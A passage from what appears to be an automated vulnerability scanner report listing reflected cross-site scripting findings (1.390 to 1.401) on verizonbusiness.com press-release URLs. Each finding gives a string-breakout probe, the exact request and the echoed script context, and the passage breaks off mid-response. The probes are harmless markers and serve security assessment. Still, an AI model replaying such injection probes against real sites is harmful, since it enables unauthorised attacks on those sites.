1.390. http://www.verizonbusiness.com/about/news/pr-25634-en-Verizon%20Business%20Earns%20Telemark¿s%20`World%20Class¿%20Ranking%20Among%20Information%20Communications%20Technology%20Providers.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25634-en-Verizon%20Business%20Earns%20Telemark.s%20`World%20Class.%20Ranking%20Among%20Information%20Communications%20Technology%20Providers.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 222c3"%3b7ee8c72751 was submitted in the REST URL parameter 2. This input was echoed as 222c3";7ee8c72751 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news222c3"%3b7ee8c72751/pr-25634-en-Verizon%20Business%20Earns%20Telemark.s%20`World%20Class.%20Ranking%20Among%20Information%20Communications%20Technology%20Providers.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:51:21 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 47317
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:51:21 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:51:21 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about/news222c3";7ee8c72751/pr-25634-en-Verizon Business Earns Telemark..s `World Class.. Ranking Among Information Communications Technology Providers.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONT
...[SNIP]...

1.391. http://www.verizonbusiness.com/about/news/pr-25634-en-Verizon%20Business%20Earns%20Telemark¿s%20`World%20Class¿%20Ranking%20Among%20Information%20Communications%20Technology%20Providers.xml [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25634-en-Verizon%20Business%20Earns%20Telemark.s%20`World%20Class.%20Ranking%20Among%20Information%20Communications%20Technology%20Providers.xml

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 911a1"%3b677cb8b9cea was submitted in the REST URL parameter 3. This input was echoed as 911a1";677cb8b9cea in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news/911a1"%3b677cb8b9cea.s%20`World%20Class.%20Ranking%20Among%20Information%20Communications%20Technology%20Providers.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:51:48 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 49879
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:51:48 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:51:48 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about/news/911a1";677cb8b9cea..s `World Class.. Ranking Among Information Communications Technology Providers.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//A
...[SNIP]...

1.392. http://www.verizonbusiness.com/about/news/pr-25634-en-Verizon%20Business%20Earns%20Telemark¿s%20`World%20Class¿%20Ranking%20Among%20Information%20Communications%20Technology%20Providers.xml [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25634-en-Verizon%20Business%20Earns%20Telemark.s%20`World%20Class.%20Ranking%20Among%20Information%20Communications%20Technology%20Providers.xml

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d93d7'%3b1d329fc1521 was submitted in the REST URL parameter 3. This input was echoed as d93d7';1d329fc1521 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news/d93d7'%3b1d329fc1521.s%20`World%20Class.%20Ranking%20Among%20Information%20Communications%20Technology%20Providers.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:51:57 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 49881
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:51:57 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:51:57 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/about/news/d93d7';1d329fc1521..s `World Class.. Ranking Among Information Communications Technology Providers.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.393. http://www.verizonbusiness.com/about/news/pr-25635-en-Bob+Toohey+Named+President+of+Verizon's+Global+Business+Unit.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25635-en-Bob+Toohey+Named+President+of+Verizon's+Global+Business+Unit.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 74c8b"%3b399b28f7104 was submitted in the REST URL parameter 1. This input was echoed as 74c8b";399b28f7104 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about74c8b"%3b399b28f7104/news/pr-25635-en-Bob+Toohey+Named+President+of+Verizon's+Global+Business+Unit.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:50:48 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40754
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:50:48 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:50:48 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link med
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about74c8b";399b28f7104/news/pr-25635-en-Bob+Toohey+Named+President+of+Verizon's+Global+Business+Unit.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACT
...[SNIP]...

1.394. http://www.verizonbusiness.com/about/news/pr-25635-en-Bob+Toohey+Named+President+of+Verizon's+Global+Business+Unit.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25635-en-Bob+Toohey+Named+President+of+Verizon's+Global+Business+Unit.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 34dea'%3bfacac72ba72 was submitted in the REST URL parameter 1. This input was echoed as 34dea';facac72ba72 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about34dea'%3bfacac72ba72/news/pr-25635-en-Bob+Toohey+Named+President+of+Verizon's+Global+Business+Unit.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:51:26 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40754
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:51:27 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:51:26 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/about34dea';facac72ba72/news/pr-25635-en-Bob+Toohey+Named+President+of+Verizon's+Global+Business+Unit.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.395. http://www.verizonbusiness.com/about/news/pr-25635-en-Bob+Toohey+Named+President+of+Verizon's+Global+Business+Unit.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25635-en-Bob+Toohey+Named+President+of+Verizon's+Global+Business+Unit.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 90d7c'%3bfb215641240 was submitted in the REST URL parameter 2. This input was echoed as 90d7c';fb215641240 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news90d7c'%3bfb215641240/pr-25635-en-Bob+Toohey+Named+President+of+Verizon's+Global+Business+Unit.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:51:56 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html; charset=UTF-8
Content-Length: 47215
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:51:57 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:51:56 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/about/news90d7c';fb215641240/pr-25635-en-Bob+Toohey+Named+President+of+Verizon's+Global+Business+Unit.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.396. http://www.verizonbusiness.com/about/news/pr-25635-en-Bob+Toohey+Named+President+of+Verizon's+Global+Business+Unit.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25635-en-Bob+Toohey+Named+President+of+Verizon's+Global+Business+Unit.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ef0ea"%3ba6f8d4b4575 was submitted in the REST URL parameter 2. This input was echoed as ef0ea";a6f8d4b4575 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/newsef0ea"%3ba6f8d4b4575/pr-25635-en-Bob+Toohey+Named+President+of+Verizon's+Global+Business+Unit.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:51:34 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 47217
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:51:34 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:51:34 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about/newsef0ea";a6f8d4b4575/pr-25635-en-Bob+Toohey+Named+President+of+Verizon's+Global+Business+Unit.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION S
...[SNIP]...

1.397. http://www.verizonbusiness.com/about/news/pr-25635-en-Bob+Toohey+Named+President+of+Verizon's+Global+Business+Unit.xml [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25635-en-Bob+Toohey+Named+President+of+Verizon's+Global+Business+Unit.xml

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8711e'%3be519a2b3f56 was submitted in the REST URL parameter 3. This input was echoed as 8711e';e519a2b3f56 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news/8711e'%3be519a2b3f56 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:52:49 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html; charset=UTF-8
Content-Length: 49711
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:52:49 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:52:49 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/about/news/8711e';e519a2b3f56'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.398. http://www.verizonbusiness.com/about/news/pr-25635-en-Bob+Toohey+Named+President+of+Verizon's+Global+Business+Unit.xml [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25635-en-Bob+Toohey+Named+President+of+Verizon's+Global+Business+Unit.xml

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2577d"%3b07b53c791a6 was submitted in the REST URL parameter 3. This input was echoed as 2577d";07b53c791a6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news/2577d"%3b07b53c791a6 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:52:15 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 49713
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:52:15 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:52:15 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about/news/2577d";07b53c791a6";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNCTION NAME

...[SNIP]...

1.399. http://www.verizonbusiness.com/about/news/pr-25636-en-Verizon+Business+Helps+Burberry+Deliver+Global+Fashion+Experience.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25636-en-Verizon+Business+Helps+Burberry+Deliver+Global+Fashion+Experience.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 87f00'%3b42a0cb38ecb was submitted in the REST URL parameter 1. This input was echoed as 87f00';42a0cb38ecb in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about87f00'%3b42a0cb38ecb/news/pr-25636-en-Verizon+Business+Helps+Burberry+Deliver+Global+Fashion+Experience.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:50:32 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40766
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:50:32 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:50:32 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/about87f00';42a0cb38ecb/news/pr-25636-en-Verizon+Business+Helps+Burberry+Deliver+Global+Fashion+Experience.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.400. http://www.verizonbusiness.com/about/news/pr-25636-en-Verizon+Business+Helps+Burberry+Deliver+Global+Fashion+Experience.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25636-en-Verizon+Business+Helps+Burberry+Deliver+Global+Fashion+Experience.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ee087"%3b963730466a1 was submitted in the REST URL parameter 1. This input was echoed as ee087";963730466a1 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /aboutee087"%3b963730466a1/news/pr-25636-en-Verizon+Business+Helps+Burberry+Deliver+Global+Fashion+Experience.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:50:16 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40764
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:50:16 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:50:16 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/aboutee087";963730466a1/news/pr-25636-en-Verizon+Business+Helps+Burberry+Deliver+Global+Fashion+Experience.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES


...[SNIP]...

1.401. http://www.verizonbusiness.com/about/news/pr-25636-en-Verizon+Business+Helps+Burberry+Deliver+Global+Fashion+Experience.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25636-en-Verizon+Business+Helps+Burberry+Deliver+Global+Fashion+Experience.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5922e"%3b3bdc27de435 was submitted in the REST URL parameter 2. This input was echoed as 5922e";3bdc27de435 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news5922e"%3b3bdc27de435/pr-25636-en-Verizon+Business+Helps+Burberry+Deliver+Global+Fashion+Experience.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
